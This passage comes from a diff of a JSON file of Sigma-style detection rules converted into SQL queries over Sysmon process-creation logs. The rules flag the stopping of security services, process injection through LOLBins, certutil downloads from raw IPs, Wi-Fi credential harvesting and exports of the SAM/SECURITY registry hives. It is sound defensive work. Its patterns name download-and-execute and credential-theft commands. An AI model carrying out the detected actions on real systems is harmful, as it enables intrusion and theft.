'%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" + "GPO" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_reg_screensaver.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", - "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", - "author": "frack113", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "author": "frack113", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "status": "experimental", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", - "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "status": "experimental", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 